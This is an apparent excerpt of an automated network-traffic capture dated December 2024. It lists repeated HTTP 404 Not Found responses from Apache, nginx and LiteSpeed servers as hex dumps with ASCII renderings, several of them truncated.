                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 11 Dec 2024 14:03:55 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a 
Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 11 Dec 2024 14:03:58 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 
22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:32 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:35 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:37 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 